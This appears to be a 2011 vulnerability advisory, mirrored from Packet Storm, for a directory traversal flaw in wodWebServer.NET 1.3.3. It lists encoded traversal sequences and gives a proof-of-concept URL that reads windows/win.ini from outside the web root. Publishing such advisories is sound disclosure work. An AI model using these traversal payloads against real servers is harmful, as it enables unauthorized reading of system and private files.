Lucene search
AutoSec ToolsPACKETSTORM:99791HistoryMar 27, 2011 - 12:00 a.m.
wodWebServer.NET 1.3.3 Directory Traversal
2011-03-2700:00:00
AutoSec Tools
packetstormsecurity.com
13
`------------------------------------------------------------------------
Software................wodWebServer.NET 1.3.3
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://www.weonlydo.com/WebServer.NET/web-http-net-server.asp
Vendor Contact Date.....3/13/2011
Disclosure Date.........3/27/2011
Tested On...............Windows Vista
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <[email protected]>
------------------------------------------------------------------------
--Description--
A directory traversal vulnerability in wodWebServer.NET 1.3.3 can be
exploited to read files outside of the web root.
--Exploit--
..%5C/
..%2F/
..%2E/
..\/
..//
.../
..\
../
--PoC--
http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini
`